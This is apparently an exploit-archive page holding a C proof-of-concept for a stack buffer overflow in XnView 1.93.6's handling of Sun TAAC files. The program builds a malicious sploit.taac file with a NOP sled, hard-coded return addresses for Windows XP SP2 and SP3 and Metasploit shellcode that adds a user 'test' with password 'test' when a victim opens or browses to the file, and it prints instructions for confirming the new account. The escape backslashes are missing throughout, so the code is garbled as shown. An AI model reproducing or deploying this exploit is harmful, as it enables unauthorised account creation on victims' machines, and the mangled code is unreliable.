XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit PoC
# Published : 2008-06-26
# Author : Shinnok
# Previous Title : OpenBSD 4.0 (FIRST ANIMATED EXPLOIT) Local Root Exploit (vga)
# Next Title : screen 4.0.3 Local Authentication Bypass Vulnerability (OpenBSD)

#include <stdio.h>
#include <stdlib.h>
/*
 XnView 1.93.6 for Windows .taac buffer overflow proof of concept.
 
The vulnerability is caused due to a boundary error when processing
the "format" keyword of Sun TAAC files. This can be exploited to
cause a stack-based buffer overflow by e.g. tricking a user into
viewing a specially crafted Sun TAAC file.

Vulnerability discoverd by Secunia research http://secunia.com/secunia_research/2008-24/advisory/

Exploit code by Shinnok raydenxy@yahoo.com
http://www.rstcenter.com

This poc will create a "special" .taac file that when opened or viewed in XnView 1.93.6 for Windows 
will cause a buffer overflow and add an user "test" with password "test".
Tested on Windows XP sp2&sp3.

greetz to escalation666
/*

/* win32_adduser -  PASS=test EXITFUNC=seh USER=test Size=232 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"x2bxc9x83xe9xccxd9xeexd9x74x24xf4x5bx81x73x13xbf"
"x93x8fx1ex83xebxfcxe2xf4x43x7bxcbx1exbfx93x04x5b"
"x83x18xf3x1bxc7x92x60x95xf0x8bx04x41x9fx92x64x57"
"x34xa7x04x1fx51xa2x4fx87x13x17x4fx6axb8x52x45x13"
"xbex51x64xeax84xc7xabx1axcax76x04x41x9bx92x64x78"
"x34x9fxc4x95xe0x8fx8exf5x34x8fx04x1fx54x1axd3x3a"
"xbbx50xbexdexdbx18xcfx2ex3ax53xf7x12x34xd3x83x95"
"xcfx8fx22x95xd7x9bx64x17x34x13x3fx1exbfx93x04x76"
"x83xccxbexe8xdfxc5x06xe6x3cx53xf4x4exd7x63x05x1a"
"xe0xfbx17xe0x35x9dxd8xe1x58xf0xe2x7ax91xf6xf7x7b"
"x9fxbcxecx3exd1xf6xfbx3excaxe0xeax6cx9fxe7xeax6d"
"xcbxb3xfbx7bxccxe7xafx31xfexd7xcbx3ex99xb5xafx70"
"xdaxe7xafx72xd0xf0xeex72xd8xe1xe0x6bxcfxb3xcex7a"
"xd2xfaxe1x77xccxe7xfdx7fxcbxfcxfdx6dx9fxe7xeax6d"
"xcbxb3xa0x5fxfbxd7x8fx1e";


unsigned char ra_sp2[] = "xedx1ex94x7c";
unsigned char ra_sp3[] = "x83xbfx8ax5b";

unsigned char nops1[257]; //256 * x90
unsigned char nops2[21]; //20 * x90

int main(int argc, char **argv)
{
    int i;
    FILE* f;
    printf("[+] XnView 1.93.6 for Windows .taac buffer overflown");
	printf("[+] Discovered by Secunia : nhttp://secunia.com/secunia_research/2008-24/advisory/n");
	printf("[+] Coded by shinnok,greetz to escalation666.n http://www.rstcenter.com n");
    if ((argc!=2)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))){
            printf("Usage: %s targetn",argv[0]);
            printf("Where target is:n");
            printf("0: WinXP SP2n");
            printf("1: WinXP SP3n");
            printf("Successfull exploitation will result in the adding of user "test" with password "test".n");
            return EXIT_SUCCESS;
    }
    for(i=0;i<256;i++) nops1[i]='x90';
    nops1[256]='';
    for(i=0;i<14;i++) nops2[i]='x90';
    nops2[20]='';
    if(atoi(argv[1])==0) {
        f=fopen("sploit.taac","wb");    
        fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'xa','xa','xa','xa');
        fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp2,nops2,scode,'xa');
    }else{
        f=fopen("sploit.taac","wb");    
        fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'xa','xa','xa','xa');
        fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp3,nops2,scode,'xa');               
    }                         
    fclose(f);
    printf("sploit.taac created!n");
    printf("Now open sploit.taac in XnView or browse from it to the folder containing sploit.taac.n");
    printf("Then check with "net user" or from control panel for the user account test.n");
    return EXIT_SUCCESS;
}

// www.Syue.com [2008-06-26]